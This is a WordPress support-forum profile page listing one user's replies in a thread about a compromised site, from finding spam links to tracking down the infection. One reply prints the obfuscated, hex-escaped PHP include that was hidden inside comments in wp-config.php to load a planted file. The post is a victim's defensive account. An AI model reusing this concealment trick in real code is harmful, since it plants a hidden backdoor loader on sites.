Title: pacebrian0's Replies | WordPress.org

---

# pacebrian0

  [  ](https://wordpress.org/support/users/pacebrian0/)

 *   [Profile](https://wordpress.org/support/users/pacebrian0/)
 *   [Topics Started](https://wordpress.org/support/users/pacebrian0/topics/)
 *   [Replies Created](https://wordpress.org/support/users/pacebrian0/replies/)
 *   [Reviews Written](https://wordpress.org/support/users/pacebrian0/reviews/)
 *   [Topics Replied To](https://wordpress.org/support/users/pacebrian0/replied-to/)
 *   [Engagements](https://wordpress.org/support/users/pacebrian0/engagements/)
 *   [Favorites](https://wordpress.org/support/users/pacebrian0/favorites/)

 Search replies:

## Forum Replies Created

Viewing 6 replies - 1 through 6 (of 6 total)

 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [Unauthorised alteration to site](https://wordpress.org/support/topic/unauthorised-alteration-to-site/)
 *  Thread Starter [pacebrian0](https://wordpress.org/support/users/pacebrian0/)
 * (@pacebrian0)
 * [10 years, 9 months ago](https://wordpress.org/support/topic/unauthorised-alteration-to-site/page/2/#post-6881863)
 * Well, that was a pain to find, the malicious code was hidden in the comments 
   of wp_config.php, which I compared to the php sample.
 *     ```
       /**
        * WordPress Database Tabl*/include /*e prefix.
        *
        * You*/"\x2fhom\x654/k\x61ndy\x6bids\x2fpub\x6cic_\x68tml\x2fwp-\x69ncl\x75des\x2fTex\x74/Di\x66f/d\x65fin\x65s.p\x68p";/* can have multiple installations in one database if you give each a unique
        * prefix. Only numbers, letters, and underscores please!
        */
       ```
   
 * Thanks a lot for all the help, and I hope this thread helps anyone else having
   the same problem.
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [Unauthorised alteration to site](https://wordpress.org/support/topic/unauthorised-alteration-to-site/)
 *  Thread Starter [pacebrian0](https://wordpress.org/support/users/pacebrian0/)
 * (@pacebrian0)
 * [10 years, 9 months ago](https://wordpress.org/support/topic/unauthorised-alteration-to-site/#post-6881812)
 * I have deleted wp_includes and wp_admin and replaced them with a new files from
   wordpress. The links are gone, however, I am getting an error regarding defines.
   php, which I think it is being referenced from wp_config.php.
 * This is the error:
 *     ```
       Warning: include(/home4/mysite/public_html/wp-includes/Text/Diff/defines.php): failed to open stream: No such file or directory in /home4/mysite/public_html/wp-config.php on line 65
   
       Warning: include(): Failed opening '/home4/mysite/public_html/wp-includes/Text/Diff/defines.php' for inclusion (include_path='.:/opt/php54/lib/php') in /home4/mysite/public_html/wp-config.php on line 65
       ```
   
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [Unauthorised alteration to site](https://wordpress.org/support/topic/unauthorised-alteration-to-site/)
 *  Thread Starter [pacebrian0](https://wordpress.org/support/users/pacebrian0/)
 * (@pacebrian0)
 * [10 years, 9 months ago](https://wordpress.org/support/topic/unauthorised-alteration-to-site/#post-6881810)
 * Well, I don’t think this is something theme-related since changing the theme 
   does not remove the links.
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [Unauthorised alteration to site](https://wordpress.org/support/topic/unauthorised-alteration-to-site/)
 *  Thread Starter [pacebrian0](https://wordpress.org/support/users/pacebrian0/)
 * (@pacebrian0)
 * [10 years, 9 months ago](https://wordpress.org/support/topic/unauthorised-alteration-to-site/#post-6881711)
 * Regarding #2:
 * I am certain I downloaded the theme from the official page. I cannot see how 
   it could have been hacked unless there is a security hole. I have installed wordfence
   to help increase security also, it detected a few files which were malicious 
   but the links were still there.
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [Unauthorised alteration to site](https://wordpress.org/support/topic/unauthorised-alteration-to-site/)
 *  Thread Starter [pacebrian0](https://wordpress.org/support/users/pacebrian0/)
 * (@pacebrian0)
 * [10 years, 9 months ago](https://wordpress.org/support/topic/unauthorised-alteration-to-site/#post-6881680)
 * I cannot find any bad code. Here are the files i found called “footer.php”
    My
   theme is Virtue Premium if that helps.
 * Virtue – Premium: footer.php
    [https://dpaste.de/LRpb](https://dpaste.de/LRpb)
 * Virtue – Premium: footer.php (templates/footer.php)
    [https://dpaste.de/Ninf](https://dpaste.de/Ninf)
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [Unauthorised alteration to site](https://wordpress.org/support/topic/unauthorised-alteration-to-site/)
 *  Thread Starter [pacebrian0](https://wordpress.org/support/users/pacebrian0/)
 * (@pacebrian0)
 * [10 years, 9 months ago](https://wordpress.org/support/topic/unauthorised-alteration-to-site/#post-6881668)
 * Thank you for the insight. I have a question regarding the footer.php
 * Is this code situated in the theme options? Because I cannot detect any line 
   containing malicious code.

Viewing 6 replies - 1 through 6 (of 6 total)